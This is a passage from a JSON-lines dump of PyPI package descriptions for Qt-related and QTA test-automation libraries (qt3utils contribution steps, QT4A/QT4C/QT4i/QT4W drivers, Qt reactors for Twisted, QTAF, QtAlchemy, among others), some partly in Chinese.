Jupyter notebooks\nthat run experiments.\nIf you need version control for your exerpiment scripts and notebooks, you\nshould create a separate git repository and install qt3utils\nin the normal way (pip install -U qt3utils) in a Python environment\nfor your experimental work. If you need to have recent changes to qt3utils\npublished to PyPI for your work, reach out to a Maintainer of this\nrepo to ask them to release a new version.7. 
Add your code and test with your hardware!We do not have an official style convention, unfortunately. However\nplease try to follow best-practices as outlined either inPEP 8 styleguideorGoogle's styleguide.\nThere are other resources online, of course, that provide \"best-practices\"\nadvice. Having said that, you will certainly find places where I've\nbroken those guides. (Ideally, somebody would go through with a linter\nand fix all of these.). Please heavily document your source code.We do not have an automatic test rig. Thiscouldbe added by somebody\nif desired. But that could be complicated given that this code requires\nspecific local hardware and the setup for each experiment\nis likely to be different. So, be sure to test your code rigorously and\nmake sure there are no unintended side-effects.Historically, documentation for this project has been \"just okay\". Please\nhelp this by adding any documentation for your changes where appropriate.\nThere is now adocsfolder that you can use to include any major\nadditions or changes.8. Push your branchOnce development and testing are complete you will want to push your\nbranch to Github in order to merge it into the rest of the code-base.When you first push a branch to Github, you will need to issue this\ncommand.> git push -u origin X-add-my-fancy-new-featureAs you add more commits to your branch, you'll still want to\npush those changes every once in a while with a simple> git push(assuming that X-add-my-fancy-new-feature is your current\nlocal working branch)Finally, before you issue a pull request, you will want to\nsynchrononize your branch with any other changes made in 'main'\nto ensure there are no conflicting changes.This is the following \"flow\" that has been used successfully in\nvarious development projects. However, there are other ways\nto do this.> git checkout main\n> git pull\n> git checkout X-add-my-fancy-new-feature\n> git rebase main\n> git push -fThe series of commands above will pull down new changes from\nGithub's main branch to your local working copy. Therebasecommand will then \"replay\" your changes on top of the\nmost recent HEAD of the main branch. If there are conflicts,\ngit will notify you and you will be forced to fix those\nconflicts before continuing with the rebase. If it seems too\ncomplicated, you cangit rebase --abortto recover and\nthen figure out what to do next. Reach out to a more experienced\ncolleague, perhaps, for help.The finalgit push -fis necessary (if there were indeed new\ncommits on the main branch) and will \"force\" push your branch\nto Github. This is necessary due to the way git works.You should then test your local branch with your hardware again!This particular flow has the benefit of making a very clear git\nhistory that shows all the commits for each branch being\nmerged in logical order.Instead of following the instructions above, you may consider\ntrying GitHub's \"rebase\" option when issuing a pull request.\nIt will attempt the same set of operations. However, you may\nnot have the opportunity to test the changes locally.9. Issue a pull requestAt the top of this qt3-utils GitHub repository is a 'pull-request' tab,\nfrom where you can create a request to merge your branch to another\nbranch (usually you merge to main)When you issue a pull request, be very clear and verbose about the\nchanges you are making. New code must be reviewed by another colleague\nbefore it gets merged to master. 
Your pull request should include things likea statement describing what is changed or newa reference to the Issue being fixed here (Github will automatically generate a handy link)a statement describing why you chose your specific implementationresults of tests on your hardware setup, which could be data, screenshots, etc. There should be a clear record demonstrating functionality.a Jupyter notebook in the \"examples\" folder that demonstrate usage and changesdocumentation10. Perform Self ReviewBefore asking a colleague to review your changes, it's generally\na good idea to review the changes yourself in Github.\nWhen you see your updates from this perspective you may find\ntypos and changes that you wish to address first.11. Obtain a Code Review from a colleagueDue to our lack of a test rig, merging should be done with care and\ncode reviews should be taken seriously. If you are asked by a colleague\nto review their code, make sure to ask a lot of questions as you read\nthrough it. You may even want to test the branch on your own setup\nto ensure it doesn't break anything.12. Address ChangesIf you and your reviewer decide changes are needed, go back\nto your branch, make changes and push new commits. Repeat\nsteps 7, 8, 10, 11 and 12 until you are satisfied.13. Merge!If you are satisfied and confident that your changes are\nready, and your reviewer has approved the changes, press the\ngreen Merge button.NotesDebuggingLICENSELICENCE"} +{"package": "qt4a", "pacakge-description": "QT4AQT4A (Quick Test for Android) is a QTA test automation driver for Android application.FeaturesSupport most versions of Android OS from 2.3 to 8.1Multiple devices can be used simultaneously in a testSupport testing multi-process application, and multiple application can be tested simultaneouslySupport testting code obfuscated applicationSupport testing with custom controlsSupport non-root devicesQT4A should be used withQTAF, please check it first.LinksDemo ProjectUsage DocumentDesign DocumentAndroidUISpy ToolQT4A (Quick Test for Android)\uff0c\u57fa\u4e8eQTA\u63d0\u4f9b\u9762\u5411Android\u5e94\u7528\u7684UI\u6d4b\u8bd5\u81ea\u52a8\u5316\u6d4b\u8bd5\u89e3\u51b3\u65b9\u6848\u3002\u7279\u6027\u4ecb\u7ecd\u652f\u6301Android 2.3 - 8.1\u7248\u672c\u652f\u6301\u591a\u8bbe\u5907\u534f\u540c\u6d4b\u8bd5\u652f\u6301\u8de8\u8fdb\u7a0b\u3001\u8de8\u5e94\u7528\u6d4b\u8bd5\u652f\u6301\u8fdb\u884c\u8fc7\u63a7\u4ef6\u6df7\u6dc6\u7684\u5b89\u88c5\u5305\u652f\u6301\u81ea\u5b9a\u4e49\uff08\u81ea\u7ed8\uff09\u63a7\u4ef6\u652f\u6301\u975eroot\u8bbe\u5907QT4A\u9700\u8981\u548cQTAF\u4e00\u8d77\u4f7f\u7528\uff0c\u8bf7\u5148\u53c2\u8003QTAF\u7684\u4f7f\u7528\u94fe\u63a5Demo\u9879\u76ee\u4ee3\u7801\u4f7f\u7528\u6587\u6863\u8bbe\u8ba1\u6587\u6863AndroidUISpy\u5de5\u5177\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt4c", "pacakge-description": "QT4CQT4C (Quick Test for Client) is a QTA test automation driver for Win32 client application.FeaturesPowerful UI driver, support Windows native controls, Web controls, Accessibility controlsWriting maintainable functional tests with QTA QPath technology and QTA UI frameworkQT4C should be used withQTAF, please check it first.Get StartedCheck out ourUsage Documentto get going with QT4C. 
There is alsosample codethat shows how to run testcase with QT4C.AnatomyIf you are interested in anatomy of QT4C, theDesign Documentmay be useful to you.QT4C (Quick Test for Client)\uff0c\u57fa\u4e8eQTA\u63d0\u4f9b\u9762\u5411Win32\u5e94\u7528\u7684UI\u6d4b\u8bd5\u81ea\u52a8\u5316\u6d4b\u8bd5\u6846\u67b6\u3002\u7279\u6027\u5f3a\u5927UI\u9a71\u52a8\u5f15\u64ce\u652f\u6301\uff0cWindows Native\u63a7\u4ef6\u3001Web\u63a7\u4ef6\u3001Accessibility\u63a7\u4ef6\u57fa\u4e8eQPath\u6280\u672f\u548cQTA UI\u6846\u67b6\uff0c\u964d\u4f4e\u4ea7\u54c1\u53d8\u5316\u7684\u811a\u672c\u7ef4\u62a4\u6295\u5165QT4C\u9700\u8981\u548cQTAF\u4e00\u8d77\u4f7f\u7528\uff0c\u8bf7\u5148\u53c2\u8003QTAF\u7684\u4f7f\u7528\u5165\u95e8\u6307\u5357\u8bf7\u67e5\u770b\u6211\u4eec\u7684\u4f7f\u7528\u6587\u6863\u4ee5\u4fbf\u60a8\u5feb\u901f\u4e0a\u624bQT4C\uff0c\u540c\u65f6\u53ef\u4ee5\u53c2\u8003\u6211\u4eec\u7684\u793a\u4f8b\u4ee3\u7801\u3002\u6846\u67b6\u539f\u7406\u5982\u679c\u4f60\u5bf9QT4C\u7684\u5b9e\u73b0\u539f\u7406\u611f\u5174\u8da3\uff0c\u53ef\u4ee5\u53c2\u8003\u6211\u4eec\u7684\u8bbe\u8ba1\u6587\u6863\u3002\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt4_gengui", "pacakge-description": "A Generic Gui Built With pyqt4. Used As Starting Point For New GUI Apps.See the Code at:https://github.com/sonofeft/Qt4_GenGUISee the Docs at:http://qt4_gengui.readthedocs.org/en/latest/See PyPI page at:https://pypi.python.org/pypi/qt4_genguiThis generic GUI places a main page, menu, toolbar, statusbar and sphinx doc directory.\nModify this starting point to suit your projets\u2019 needs."} +{"package": "qt4i", "pacakge-description": "QT4iQT4i (Quick Test for iOS) is a QTA test automation driver for iOS application.FeaturesEasy to use, only Apple developer certificate is needed, no jailbreak or test stub is requiredSupport native, web and custom controls with AccessibilitySupport iOS device and simulator, and multiple devices can be used simultaneously in a testLow maintenance costs with QTA UI test automation frameworkQT4i should be used withQTAF, please check it first.Get StartedCheck out ourUsage Documentto get going with QT4i. 
There is alsosample codethat shows how to run testcase with QT4i.AnatomyIf you are interested in anatomy of QT4i, theDesign Documentmay be useful to you.QT4i(Quick Test for iOS)\uff0c\u57fa\u4e8eQTA\u63d0\u4f9b\u9762\u5411iOS\u5e94\u7528\u7684UI\u6d4b\u8bd5\u81ea\u52a8\u5316\u6d4b\u8bd5\u89e3\u51b3\u65b9\u6848\u3002\u4e3b\u8981\u7279\u6027\u8f7b\u677e\u6613\u7528\u2014\u2014\u65e0\u9700\u8d8a\u72f1\uff0c\u65e0\u9700\u63d2\u6869\uff0c\u53ea\u8981\u662f\u5f00\u53d1\u8005\u8bc1\u4e66\u7f16\u8bd1\u7684\u7248\u672c\u5373\u53ef\u8fdb\u884c\u6d4b\u8bd5\u5f3a\u5927\u5f15\u64ce\u2014\u2014\u652f\u6301iOS Native\u63a7\u4ef6\u3001webview\u63a7\u4ef6\u548c\u81ea\u5b9a\u4e49\u63a7\u4ef6\u5e73\u53f0\u652f\u6301\u2014\u2014\u5168\u9762\u517c\u5bb9iOS\u771f\u673a\u548c\u6a21\u62df\u5668\uff0c\u57fa\u4e8e\u5206\u5e03\u5f0f\u6280\u672f\uff0c\u9ad8\u6548\u5e76\u53d1\u6267\u884c\u6d4b\u8bd5\u9ad8\u6548\u7ef4\u62a4\u2014\u2014\u57fa\u4e8eQPath\u6280\u672f\u548cQTAFUI\u6846\u67b6\uff0c\u964d\u4f4e\u4ea7\u54c1\u53d8\u5316\u7684\u811a\u672c\u7ef4\u62a4\u6295\u5165QT4i\u9700\u8981\u548cQTAF\u4e00\u8d77\u4f7f\u7528\uff0c\u8bf7\u5148\u53c2\u8003QTAF\u7684\u4f7f\u7528\u5165\u95e8\u6307\u5357\u8bf7\u67e5\u770b\u6211\u4eec\u7684\u4f7f\u7528\u6587\u6863\u4ee5\u4fbf\u60a8\u5feb\u901f\u4e0a\u624bQT4i\uff0c\u540c\u65f6\u53ef\u4ee5\u53c2\u8003\u6211\u4eec\u7684\u793a\u4f8b\u4ee3\u7801\u3002\u6846\u67b6\u539f\u7406\u5982\u679c\u4f60\u5bf9QT4i\u7684\u5b9e\u73b0\u539f\u7406\u611f\u5174\u8da3\uff0c\u53ef\u4ee5\u53c2\u8003\u6211\u4eec\u7684\u8bbe\u8ba1\u6587\u6863\u3002\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt4ImageLabel", "pacakge-description": "UNKNOWN"} +{"package": "qt4reactor", "pacakge-description": "Qt4ReactorUsing the QtReactor-------------------Before running / importing any other Twisted code, invoke:::app = QApplication(sys.argv) # your code to init QtCorefrom twisted.application import reactorsreactors.installReactor('pyqt4')or::app = QApplication(sys.argv) # your code to init QtCorefrom twisted.application import reactorsreactors.installReactor('pyside4')alternatively (gui example):::app = PyQt4.QtGui(sys.argv) # your code to init QtGuifrom qtreactor import pyqt4reactorpyqt4reactor.install()Testing~~~~~~~::trial --reactor=pyqt4 [twisted] [twisted.test] [twisted.test.test_internet]Testing with a Gui~~~~~~~~~~~~~~~~~~Twisted trial can be run for a Gui test using gtrial. Run Trial in thesame directory as bin/gtrial and it pops up a trivial gui... hit thebuton and it all runs the same... don't use the --reactor option whencalling gtrial... but all the other options appear to work.::cp gtrial cd && trialIf you're writing a conventional Qt application and just want twisted asan addon, you can get that by calling reactor.runReturn() instead ofrun(). This call needs to occur after your installation of of thereactor and after QApplication.exec\\_() (or QCoreApplication.exec\\_()whichever you are using.reactor.run() will also work as expected in a typical twistedapplicationNote that if a QApplication or QCoreApplication instance isn'tconstructed prior to calling reactor run, an internally ownedQCoreApplication is created and destroyed. 
This won't work if you callrunReturn instead of run unless you take responsibility for destroyingQCoreApplication yourself...However, most users want this reactor to do gui stuff so this shouldn'tbe an issue.Performance impact of Qt has been reduced by minimizing use of signalingwhich is expensive.Examples / tests in ghtTests"} +{"package": "qt4w", "pacakge-description": "QT4WQT4W (Quick Test for Web) is a QTA test automation driver for Web.FeaturesAndroid platform: support web automated testing based on webkit, X5 (used withQT4A).IOS platform: Support Web automation testing for embedded pages of IOS applications and browser applications (used withQT4I).Windows platform: Supports web automation based on Chrome, IE kernel (used with QT4C),\nNow QT4C is in the open source process.QT4W consists of three modules: WebView, webDriver, and WebControl module.WebViewWebView is an abstraction of the browser window, which is a re-encapsulation of the native control. QT4W only defines the relevant interface of WebView, but does not give a concrete implementation. QT4X provides some implementations of WebView on each side. For example, QT4C provides implementations such as IeWebView and ChromeWebView.\nFollowing is the list of supported WebView.WebViewPlatform/OSDescriptionProviderIEWindowsIE browser or embedded IE window, supporting version from 7 to 11Provided by QT4CChromeWindowsChrome browser or embedded Webkit windowProvided by QT4CTBSWindowsQQ browser or embedded QQ browser windowProvided by QT4CCEFWindowsChromium embedded windowProvided by QT4CChromeLinuxChrome headless browserProvided by chrome-headless-browserAndroidBuildinAndroidbuild-in browser and embedded Web window on AndroidProvided byQT4AX5AndroidQQ browser or embedded QQ browser(X5) windowProvided byQT4AXWalkAndroidembedded XWalk windowProvided byAndroidWXMPLibiOSBuildiniOSbuild-in browser and embedded Web window on iOSProvided byQT4iWeChat Mini Program&WeChat H5WeChat AndroidWeChat Mini Program OR WeChat H5Provided byAndroidWXMPLibChromeMacOSChrome browser or embedded Webkit windowProvided by QT4MacWebDriverWebDriver is the driver layer of web automation. This module is mainly used to handle Dom structure related operations, such as finding web elements. Implementation of WebDriver mostly involved with Browser engine.Following is the list of supported WebDriver.WebDriver\u8bf4\u660e\u76f8\u5173\u5b9e\u73b0\u4ee3\u7801IEIE Trident engineProvided byQT4WWebkitWebkit engineProvided byQT4WWebControlThe WebControl module defines the WebElement and WebPage interfaces and provides implementations. 
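As a purely illustrative sketch of the page-encapsulation idea (the import path, the ui_map layout and the XPath locator class below are assumptions made for illustration, not necessarily the exact QT4W API; the usage documentation is the authoritative reference):\n\nfrom qt4w.webcontrols import WebPage, WebElement, XPath   # assumed import path\n\nclass SearchPage(WebPage):\n    '''Encapsulates one web page of the application under test.'''\n    ui_map = {\n        'keyword': {'type': WebElement, 'locator': XPath(\"//input[@id='kw']\")},        # hypothetical locator\n        'submit':  {'type': WebElement, 'locator': XPath(\"//button[@type='submit']\")},  # hypothetical locator\n    }\n\nA test case would then drive the page through these named elements instead of raw XPath strings scattered across the scripts, which is what keeps maintenance cost low when the page structure changes.\n\n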
In addition, QT4W also encapsulates other common web elements that are used to encapsulate pages for web automation.Webelement and WebPage usage refer to usage documentation\u3002Usage scenarios and installationQT4W can be used for web applications or embedded page automation, which cannot be used independently and needs to be used in conjunction with other native layer automation frameworks:Android: use and installation, please refer toQT4A Document.iOS: use and install, please refer toQT4i document.Windows: use and install, please refer to QT4C documentlinksUsage DocumentDesign DocumentQT4W(Quick Test for Web)\u662fQTA\u6d4b\u8bd5\u4f53\u7cfb\u4e2d\u7684\u4e00\u73af\uff0c\u4e3b\u8981\u7528\u4e8eWeb\u81ea\u52a8\u5316\u6d4b\u8bd5\u3002\u652f\u6301\u591a\u79cd\u5e73\u53f0\u7684Web\u81ea\u52a8\u5316Android\u5e73\u53f0\uff1a\u652f\u6301\u57fa\u4e8ewebkit\uff0cX5\u7b49\u5185\u6838Web\u81ea\u52a8\u5316\u6d4b\u8bd5\uff08\u548cQT4A\u4e00\u8d77\u4f7f\u7528)\u3002IOS\u5e73\u53f0\uff1a\u652f\u6301IOS\u5e94\u7528\u7684\u5185\u5d4c\u9875\u9762\u53ca\u6d4f\u89c8\u5668\u5e94\u7528\u7684Web\u81ea\u52a8\u5316\u6d4b\u8bd5\uff08\u548cQT4I\u4e00\u8d77\u4f7f\u7528\u3002Windows\u5e73\u53f0\uff1a\u652f\u6301\u57fa\u4e8eChrome\uff0cIE\u5185\u6838\u7684Web\u81ea\u52a8\u5316\u6d4b\u8bd5\uff08\u548cQT4C\u4e00\u8d77\u4f7f\u7528\uff09\uff0c\u76ee\u524dQT4C\u6b63\u5728\u5f00\u6e90\u6d41\u7a0b\u4e2d\u3002QT4W\u662fQTA\u6d4b\u8bd5\u4f53\u7cfb\u4e2dWeb\u81ea\u52a8\u5316\u6d4b\u8bd5\u7684\u57fa\u7840\uff0c \u5305\u542b\u4e09\u4e2a\u6a21\u5757\uff1aWebView\u3001webDriver\u4ee5\u53caWebControl\u6a21\u5757\u3002WebViewWebView\u662f\u5bf9\u6d4f\u89c8\u5668\u7a97\u53e3\u7684\u62bd\u8c61\uff0c\u662f\u5bf9\u539f\u751f\u63a7\u4ef6\u7684\u518d\u6b21\u5c01\u88c5\u3002QT4W\u53ea\u662f\u5b9a\u4e49\u4e86WebView\u7684\u76f8\u5173\u63a5\u53e3\uff0c\u5e76\u672a\u7ed9\u51fa\u5177\u4f53\u5b9e\u73b0\u3002QT4X\u5404\u7aef\u63d0\u4f9b\u4e86\u90e8\u5206WebView\u7684\u5b9e\u73b0\uff0c\u4f8b\u5982QT4C\u4e2d\u63d0\u4f9bIeWebView\u3001ChromeWebView\u7b49\u5b9e\u73b0\u3002\n\u76ee\u524dQT4W\u652f\u6301\u7684WebView\u6709\uff1aWebView\u5e73\u53f0\u6216\u64cd\u4f5c\u7cfb\u7edf\u8bf4\u660e\u76f8\u5173\u5b9e\u73b0\u4ee3\u7801IEWindowsIE\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\uff0c\u652f\u6301IE 7\uff5e11\u7531QT4C\u63d0\u4f9bChromeWindowsChrome\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4C\u63d0\u4f9bTBSWindowsQQ\u6d4f\u89c8\u5668\u548c\u76f8\u5173\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4C\u63d0\u4f9bCEFWindowsChromium\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4C\u63d0\u4f9bChromeLinuxLinux\u4e0b\u7684Headless\u6a21\u5f0f\u7684Chrome\u6d4f\u89c8\u5668\u4f7f\u7528\u7531chrome-headless-browser\u63d0\u4f9bAndroidBuildinAndroidAndroid\u7cfb\u7edf\u5185\u7f6e\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4A\u63d0\u4f9bX5AndroidQQ\u79fb\u52a8\u6d4f\u89c8\u5668\u548cX5\u5185\u6838\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4A\u63d0\u4f9bXWalkAndroidXWalk\u5185\u6838\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531AndroidWXMPLib\u63d0\u4f9biOSBuildiniOSiOS\u7cfb\u7edf\u5185\u7f6e\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4i\u63d0\u4f9b\u5fae\u4fe1\u5c0f\u7a0b\u5e8f&\u5fae\u4fe1H5Android\u5fae\u4fe1\u5fae\u4fe1\u5c0f\u7a0b\u5e8f\u6216\u8005\u5fae\u4fe1H5\u4f7f\u7528\u7531AndroidWXMPLib\u63d0\u4f9bChromeMacOSMac 
OS\u4e0b\u7684Chrome\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4Mac\u63d0\u4f9b\u5982\u9700\u8981\u6269\u5c55\u65b0\u7684WebView\u7c7b\u578b\uff0c\u8bf7\u53c2\u8003WebView\u5c01\u88c5\u6587\u6863\u3002WebDriverWebDriver\u662fWeb\u81ea\u52a8\u5316\u4e2d\u9a71\u52a8\u5c42\u7684\u5c01\u88c5\uff0c\u8be5\u6a21\u5757\u4e3b\u8981\u7528\u6765\u5904\u7406DOM\u7ed3\u6784\u76f8\u5173\u64cd\u4f5c\uff0c\u4f8b\u5982\u67e5\u627eweb\u5143\u7d20\u7b49\uff0c\u4e00\u822c\u662f\u6d4f\u89c8\u5668\u5185\u6838\u76f8\u5173\u3002\u76ee\u524dQT4W\u652f\u6301\u7684WebDriver\u6709\uff1aWebDriver\u8bf4\u660e\u76f8\u5173\u5b9e\u73b0\u4ee3\u7801IEIE\u5185\u6838\u4f7f\u7528\u7531QT4W\u5185\u7f6eWebkitWebkit\u5185\u6838\u4f7f\u7528\u7531QT4W\u5185\u7f6e\u5982\u9700\u8981\u6269\u5c55\u65b0\u7684WebDriver\u8bf7\u53c2\u8003WebDriver\u5c01\u88c5\u6587\u6863\u3002WebControlWebControl\u6a21\u5757\u5b9a\u4e49WebElement\u4ee5\u53caWebPage\u7684\u63a5\u53e3\uff0c\u5e76\u4e14\u7ed9\u51fa\u4e86\u76f8\u5173\u5b9e\u73b0\u3002\u6b64\u5916\uff0cQT4W\u8fd8\u5c01\u88c5\u4e86\u5176\u4ed6\u7684\u5e38\u7528Web\u5143\u7d20\uff0c\u4f7f\u7528\u8be5\u6a21\u5757\u6765\u5c01\u88c5Web\u81ea\u52a8\u5316\u65f6\u7684\u9875\u9762\u3002\u4f7f\u7528\u573a\u666f\u53ca\u5b89\u88c5QT4W\u53ef\u7528\u4e8e\u5404\u4e2a\u7aef\u4e0a\u7684Web\u5e94\u7528\u6216\u8005Native\u5e94\u7528\u5185\u5d4cWeb\u9875\u9762\u7684\u81ea\u52a8\u5316\uff0c\u5176\u4e0d\u80fd\u72ec\u7acb\u4f7f\u7528\u4ee5\u53ca\u9700\u8981\u7ed3\u5408\u5176\u4ed6Native\u5c42\u7684\u81ea\u52a8\u5316\u6846\u67b6\u4e00\u8d77\u4f7f\u7528\uff1aAndroid\u7aef\u7684\u4f7f\u7528\u53ca\u5b89\u88c5\uff0c\u8bf7\u53c2\u8003QT4A\u6587\u6863iOS\u7aef\u7684\u4f7f\u7528\u53ca\u5b89\u88c5\uff0c\u8bf7\u53c2\u8003QT4i\u6587\u6863Windows\u7aef\u7684\u4f7f\u7528\u53ca\u5b89\u88c5\uff0c\u8bf7\u53c2\u8003QT4C\u6587\u6863\u94fe\u63a5\u4f7f\u7528\u6587\u6863\u8bbe\u8ba1\u6587\u6863\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt5", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qt5-applications", "pacakge-description": "Perhaps docs will follow but for now seethe pyqt-tools readmeandthe qt-tools readme. This package provides just the collection of Qt\napplications to avoid repeating the same large files in several packages for\ndifferent Python versions. These files are not intended to be used directly."} +{"package": "qt5-cef", "pacakge-description": "version: 1.1.7\n\nsth tips(mac):\n1, cefpython3== version 57.0, python version to use the version 3.7, 3.7 version is not supported.\ncefpython3==66.0. If the mac os version is less than 11(big sur), you need to enable the external_message_pump parameter. Otherwise, the page cannot respond to the event loop properly.\n3, cefpython3==66.0 version, if the native html select tag element appears in the page, after clicking will produce a flash back phenomenon.\n4. For mac os packaging, use the pyinstaller package tool (pyinstaller version is 4.3).Version: 1.1.8 / 1.1.9 / 1.1.10\n\nsth tips:\n1. When the embedded page is cross-domain, the request request is blocked through CEF\n2. WebRequestClient OnDownloadData() accepted byte as the data type, but actually received string as the data type. 
Write to byte before buffering; otherwise, the output parameter is not fully displayed"} +{"package": "qt5-levelmeter", "pacakge-description": "Level Meter (VU Meter) for QT5Installation:From source:git clone https://gitlab.com/t-5/python3-qt5-levelmeter.git\ncd python3-qt5-levelmeter\npip3 install .Debian Package:I have a prebuilt debian package for this module.\nPlease refer to the pagehttps://t-5.eu/hp/Software/Debian%20repository/to setup the repo.\nAfter the repo is setup you can install the package by issueingapt install python3-qt5-levelmeterin a shell.Usage:Usage:\nfrom qt5_levelmeter import QLevelMetermeter = QLevelMeter(parent)call periodically:\nmeter.levelChanged(levelInDb)"} +{"package": "qt5reactor", "pacakge-description": "Using the Qt5ReactorQt5Reactor is compatible with both PyQt5 and PySide2.Install using pippip install qt5reactorBefore running / importing any other Twisted code, invoke:app = QApplication(sys.argv) # your code to init QtCore\nfrom twisted.application import reactors\nreactors.installReactor('qt5')orapp = QApplication(sys.argv) # your code to init QtCore\nimport qt5reactor\nqt5reactor.install()Testingtrial --reactor=qt5 [twisted] [twisted.test] [twisted.test.test_internet]Make sure the plugin directory is in path or in the current directory for\nreactor discovery to work.There is alsopytest-twistedfor use withpytest.\nYou can specify to use the qt5reactor by adding--reactor=qt5reactor."} +{"package": "qt5reactor-fork", "pacakge-description": "Qt5ReactorUsing the QtReactorBefore running / importing any other Twisted code, invoke:app = QApplication(sys.argv) # your code to init QtCore\nfrom twisted.application import reactors\nreactors.installReactor('qt5')orapp = QApplication(sys.argv) # your code to init QtCore\nimport qt5reactor\nqt5reactor.install()Testingtrial --reactor=qt5 [twisted] [twisted.test] [twisted.test.test_internet]Make sure the plugin directory is in path or in the current directory for\nreactor discovery to work.Testing on Python 3trialdoes not work on Python3 yet. Use Twisted\u2019sPython 3 test runnerinstead.Install the reactor before callingunittest.main().import qt5reactor\nqt5reactor.install()\nunittest.main(...)"} +{"package": "qt5-t5darkstyle", "pacakge-description": "Dark Stylesheet for QT5the css and icons were inspired byhttps://github.com/ColinDuquesnoy/QDarkStyleSheetwhich are Copyright (c) 2013-2018 Colin DuquesnoyUsage:from qt5_t5darkstyle import darkstyle_css\nwidget.setStylesheet(darkstyle_css())or set your own colors with:widget.setStylesheet(darkstyle_css(MY_COLORS_DICT))"} +{"package": "qt5-tools", "pacakge-description": "Perhaps docs will follow but for now seethe pyqt-tools readme. This\npackage provides just the wrappers forqt-applications."} +{"package": "qt6-applications", "pacakge-description": "Perhaps docs will follow but for now seethe pyqt-tools readmeandthe qt-tools readme. This package provides just the collection of Qt\napplications to avoid repeating the same large files in several packages for\ndifferent Python versions. These files are not intended to be used directly."} +{"package": "qt6-tools", "pacakge-description": "Perhaps docs will follow but for now seethe pyqt-tools readme. 
This\npackage provides just the wrappers forqt-applications."} +{"package": "qtable", "pacakge-description": "refer to .md files inhttps://github.com/ihgazni2/qtable"} +{"package": "qtaf", "pacakge-description": "QTAFQTA is a cross-platform test automation tool for servers and native, hybrid and applications.Supported PlatformsiOS (powered byQT4idriver)Android (powered byQT4Adriver)Web (powered byQT4Wdriver)Windows (powered by QT4C driver)macOS (powered by QT4Mac driver))Server (powered by QT4S driver)QTAF (QTA Framework) is a base framework for QTA, including,testbasetuiaTestbaseTestbase is a test framework providing test execution, reporting and management, and is the common base for each platform-specific QTA driver.For more inforamtion about quick startup, usage and API reference, please readtestbase's document.TUIATUIA (Tencent UI Automation) is a base framework for UI test automation, which is used by each platform-specific QTA driver for client.For more inforamtion about quick startup, usage and API reference, please readTUIA's document.QTA\u662f\u4e00\u4e2a\u8de8\u5e73\u53f0\u7684\u6d4b\u8bd5\u81ea\u52a8\u5316\u5de5\u5177\uff0c\u9002\u7528\u4e8e\u540e\u53f0\u3001\u539f\u751f\u6216\u6df7\u5408\u578b\u5ba2\u6237\u7aef\u5e94\u7528\u7684\u6d4b\u8bd5\u3002\u5e73\u53f0\u652f\u6301iOS (\u7531QT4idriver\u63d0\u4f9b)Android (\u7531QT4Adriver\u63d0\u4f9b)Web (\u7531QT4Wdriver\u63d0\u4f9b)Windows (\u7531QT4C driver\u63d0\u4f9b)macOS (\u7531QT4Mac driver\u63d0\u4f9b)Server (\u7531QT4S driver\u63d0\u4f9b)QTAF (QTA Framework)\u662fQTA\u7684\u57fa\u7840\u6846\u67b6\uff0c\u5305\u62ec\u4ee5\u4e0b\u6a21\u5757\uff1atestbasetuiaTestbaseTestbase\u662f\u6d4b\u8bd5\u6846\u67b6\u57fa\u7840\uff0c\u63d0\u4f9b\u5305\u62ec\u6d4b\u8bd5\u6267\u884c\u3001\u62a5\u544a\u548c\u7528\u4f8b\u7ba1\u7406\u7b49\u57fa\u7840\u529f\u80fd\u3002Testbase\u4f1a\u88ab\u5404\u4e2a\u5e73\u53f0\u7684QTA Driver\u6240\u4f7f\u7528\u3002\u5feb\u901f\u5165\u95e8\u3001\u4f7f\u7528\u548c\u63a5\u53e3\u6587\u6863\u8bf7\u53c2\u8003\u300aTestbase\u6587\u6863\u300b\u3002TUIATUIA (Tencent UI Automation)\u662fUI\u81ea\u52a8\u5316\u57fa\u7840\u5e93\uff0c\u4e3aQTA\u5404\u4e2a\u5e73\u53f0\u4e0b\u7684\u5ba2\u6237\u7aefUI\u6d4b\u8bd5Driver\u6240\u4f7f\u7528\u3002\u5feb\u901f\u5165\u95e8\u3001\u4f7f\u7528\u548c\u63a5\u53e3\u6587\u6863\u8bf7\u53c2\u8003\u300aTUIA\u6587\u6863\u300b\u3002\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt-aider", "pacakge-description": "qt-aiderAn extension library for Qt libraryLicense: Apache-2.0Documentation:https://qt-aider.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand thePyPackageTemplateproject template.This library is an extension library build on top of Qt library.History0.3.0 (2019-01-09)Renamed from \u2018rabird.qt\u2019 to \u2018qt-aider\u2019"} +{"package": "qtalchemy", "pacakge-description": "IntroductionThe QtAlchemy library is a collection of Qt Model-View classes and helper\nfunctions to aid in rapid development of desktop database applications. It\naims to provide a strong API for exposing foreign key relationships in elegant\nand immediate ways to the user of applications. Context menus, searches and\ncombo-boxes and tabbed interfaces are all utilized. The use of SQLAlchemy\nmakes it possible that these features are supported on a variety of database\nbackends with virtually no code changes.The Command class gives a way to construct menus and toolbars from decorated\npython functions. 
